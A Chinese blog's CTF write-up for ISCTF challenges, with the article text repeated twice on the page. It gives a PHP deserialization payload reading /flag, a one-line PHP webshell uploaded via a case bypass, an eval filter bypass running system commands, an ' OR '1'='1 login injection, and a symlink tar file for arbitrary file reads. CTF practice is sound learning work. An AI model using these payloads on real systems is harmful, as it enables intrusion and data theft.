博客快捷键

按住 Shift 键查看可用快捷键

ShiftK

开启/关闭快捷键功能

ShiftA

打开/关闭中控台

ShiftD

深色/浅色显示模式

ShiftS

站内搜索

ShiftR

随机访问

ShiftH

返回首页

ShiftL

友链页面

ShiftP

关于本站

ShiftI

原版/本站右键菜单

松开 Shift 键或点击外部区域关闭

文章详情

互动

【CTF】ISCTF解析

7994分钟2025-12-0281未知

文章详细分析了ez_unserialize存在的一个反序列化漏洞，指出通过构造特定的序列化字符串和利用伪协议读取本地文件的方法可以获取flag。文章展示了如何通过构造恶意类和序列化字符串来触发漏洞，并给出了构造的payload示例。同时，文章还探讨了如何利用上传的PHP文件执行命令获取flag，并通过dirsearch扫描找到登录位置进行攻击。此外，文章还讨论了如何绕过代码执行限制，通过eval函数执行系统命令。最后，文章通过解析微软拼音输入历史文件和生成含有软链接的压缩包来获取flag，提供了详细的实现代码和解析过程。

ez_unserialize

审计附件，发现首页处显然存在反序列化漏洞：

php

$ss = substr($s, strlen("blueshark:"));
$o = @unserialize($ss);  // ← 这里存在漏洞

然后注意到引用require_once "./classes.php"，故可以通过该类来构造攻击代码。

在classes.php中很显然能看到明显问题：ShitMountant类在__destruct()时会调用fetch()方法，会使用file_get_contents($this->url)读取URL内容。那么我们可以构造伪协议来读取本地文件。据此，可以构造序列化字符串：

php

<?php
class FileLogger {
    public $logfile = "/tmp/notehub.log";
    public $content = "";
}

class ShitMountant {
    public $url;
    public $logger;
    
    public function __construct($url) {
        $this->url = $url;
        $this->logger = new FileLogger();
    }
}

// 创建恶意对象
$obj = new ShitMountant("file:///flag");
$payload = serialize($obj);
echo "blueshark:" . $payload;
?>

因此构造得出payload：

blueshark:O:12:"ShitMountant":2:{s:3:"url";s:12:"file:///flag";s:6:"logger";O:10:"FileLogger":2:{s:7:"logfile";s:16:"/tmp/notehub.log";s:7:"content";s:0:"";}}

而后发送POST请求，访问api.php即可得到flag：

Online_notice_board

检查CVE了解了主要攻击过程，注册用户时email填入普通字符串（如user3），头像上传php文件，并用大小写绕过：

php

<?pHp system($_GET["cmd"]); ?>

上传后访问储存位置/images/user3/12.php?cmd=cat%20/flag，得到flag：

ezrce

通过给出的源码可以看出，code的限制是：preg_match('/^[A-Za-z_;]+$/', $code)。

允许：大小写字母A-Z,a-z、括号()、下划线_、分号;。
禁止：数字、引号（单双引号）、空格、$（变量符号）、点.、逗号,、反引号等。

根据AI的说法，可以通过如下构造绕过：

php

code=eval(end(current(get_defined_vars())));&b=system('cat /flag');

原理解析：

get_defined_vars(): 返回一个包含所有已定义变量列表的多维数组（包括 $_GET, $_POST, $_FILES, $_COOKIE 等）。在大多数环境中，$_GET数组通常位于这个列表的前面。
current(...): 返回数组中的当前单元。通常get_defined_vars()返回的数组第一个元素就是$_GET数组。
end(...): 将数组的内部指针移动到最后一个单元并返回其值。我们通过 URL 传入了两个参数：code和b。此时$_GET数组大致是['code' => '...', 'b' => "system('cat /flag');"]。
end($_GET)就会取出最后一个参数的值，即system('cat /flag');。
eval(...): 最终执行取出的字符串。

flag到底在哪

用dirsearch扫描目录（或访问robots.txt），找到登录位置运算/admin/login.php，根据提示，用户名使用admin，密码尝试sql注入（注意逻辑符大写，太坑了）

' OR '1'='1

进入后直接上传一句话木马：

php

<?pHp system($_GET["cmd"]); ?>

在环境变量中发现flag：

flag？我就借走了

启动靶机，发现站点是一个tar解压站，再根据题目，联想到可以生成一个含有软链接的压缩包，使得解压缩时能够读取flag，故实现代码如下：

python

import tarfile
with tarfile.open("sy.tar", "w") as t:
    info = tarfile.TarInfo("flag")
    info.type = tarfile.SYMTYPE
    info.linkname = "/flag"
    t.addfile(info)

将生成的sy.tar上传，解压即可读取得到flag。

小蓝鲨的神秘文件

查询可知，ChsPinyinUDL.dat是微软拼音的输入历史，并找到了它的解析代码：

python

import os

# 处理 ChsPinyinUDL.dat
with open(f"isctf\\小蓝鲨的神秘文件\\ChsPinyinUDL.dat", "rb") as f:
    data = f.read()[9216:]

with open("1.txt", "w", encoding="utf-16") as output1:
    i = 60
    n = 1
    results = []
    while True:
        chunk = n * i
        if chunk >= len(data):
            break
        chunk_len = data[chunk + 12:chunk + 12 + 48]
        decoded_str = chunk_len.decode("utf-16")
        if decoded_str:  # 只写入非空字符串
            results.append(decoded_str)
        n += 1
    output1.write("\n".join(results) + "\n")

烧鸡

生活明朗，万物可爱

本文是原创文章，采用 CC BY-NC-SA 4.0 协议，完整转载请注明来自烧鸡

比赛5 漏洞2 PHP1

喜欢这篇文章的人也看了

随便逛逛

【CTF】软件系统安全赛题解

PaletteFlow技术说明文章

隐私政策

评论内容

0/500

昵称

邮箱

网址

滚动到此处加载评论...

安知鱼

来自安知鱼最新设计与科技的文章

查看全部

文章详情

互动

【CTF】ISCTF解析

7994分钟2025-12-0281未知

ez_unserialize

审计附件，发现首页处显然存在反序列化漏洞：

php

$ss = substr($s, strlen("blueshark:"));
$o = @unserialize($ss);  // ← 这里存在漏洞

然后注意到引用require_once "./classes.php"，故可以通过该类来构造攻击代码。

php

<?php
class FileLogger {
    public $logfile = "/tmp/notehub.log";
    public $content = "";
}

class ShitMountant {
    public $url;
    public $logger;
    
    public function __construct($url) {
        $this->url = $url;
        $this->logger = new FileLogger();
    }
}

// 创建恶意对象
$obj = new ShitMountant("file:///flag");
$payload = serialize($obj);
echo "blueshark:" . $payload;
?>

因此构造得出payload：

blueshark:O:12:"ShitMountant":2:{s:3:"url";s:12:"file:///flag";s:6:"logger";O:10:"FileLogger":2:{s:7:"logfile";s:16:"/tmp/notehub.log";s:7:"content";s:0:"";}}

而后发送POST请求，访问api.php即可得到flag：

Online_notice_board

检查CVE了解了主要攻击过程，注册用户时email填入普通字符串（如user3），头像上传php文件，并用大小写绕过：

php

<?pHp system($_GET["cmd"]); ?>

上传后访问储存位置/images/user3/12.php?cmd=cat%20/flag，得到flag：

ezrce

通过给出的源码可以看出，code的限制是：preg_match('/^[A-Za-z_;]+$/', $code)。

允许：大小写字母A-Z,a-z、括号()、下划线_、分号;。
禁止：数字、引号（单双引号）、空格、$（变量符号）、点.、逗号,、反引号等。

根据AI的说法，可以通过如下构造绕过：

php

code=eval(end(current(get_defined_vars())));&b=system('cat /flag');

原理解析：

get_defined_vars(): 返回一个包含所有已定义变量列表的多维数组（包括 $_GET, $_POST, $_FILES, $_COOKIE 等）。在大多数环境中，$_GET数组通常位于这个列表的前面。
current(...): 返回数组中的当前单元。通常get_defined_vars()返回的数组第一个元素就是$_GET数组。
end(...): 将数组的内部指针移动到最后一个单元并返回其值。我们通过 URL 传入了两个参数：code和b。此时$_GET数组大致是['code' => '...', 'b' => "system('cat /flag');"]。
end($_GET)就会取出最后一个参数的值，即system('cat /flag');。
eval(...): 最终执行取出的字符串。

flag到底在哪

用dirsearch扫描目录（或访问robots.txt），找到登录位置运算/admin/login.php，根据提示，用户名使用admin，密码尝试sql注入（注意逻辑符大写，太坑了）

' OR '1'='1

进入后直接上传一句话木马：

php

<?pHp system($_GET["cmd"]); ?>

在环境变量中发现flag：

flag？我就借走了

启动靶机，发现站点是一个tar解压站，再根据题目，联想到可以生成一个含有软链接的压缩包，使得解压缩时能够读取flag，故实现代码如下：

python

import tarfile
with tarfile.open("sy.tar", "w") as t:
    info = tarfile.TarInfo("flag")
    info.type = tarfile.SYMTYPE
    info.linkname = "/flag"
    t.addfile(info)

将生成的sy.tar上传，解压即可读取得到flag。

小蓝鲨的神秘文件

查询可知，ChsPinyinUDL.dat是微软拼音的输入历史，并找到了它的解析代码：

python

import os

# 处理 ChsPinyinUDL.dat
with open(f"isctf\\小蓝鲨的神秘文件\\ChsPinyinUDL.dat", "rb") as f:
    data = f.read()[9216:]

with open("1.txt", "w", encoding="utf-16") as output1:
    i = 60
    n = 1
    results = []
    while True:
        chunk = n * i
        if chunk >= len(data):
            break
        chunk_len = data[chunk + 12:chunk + 12 + 48]
        decoded_str = chunk_len.decode("utf-16")
        if decoded_str:  # 只写入非空字符串
            results.append(decoded_str)
        n += 1
    output1.write("\n".join(results) + "\n")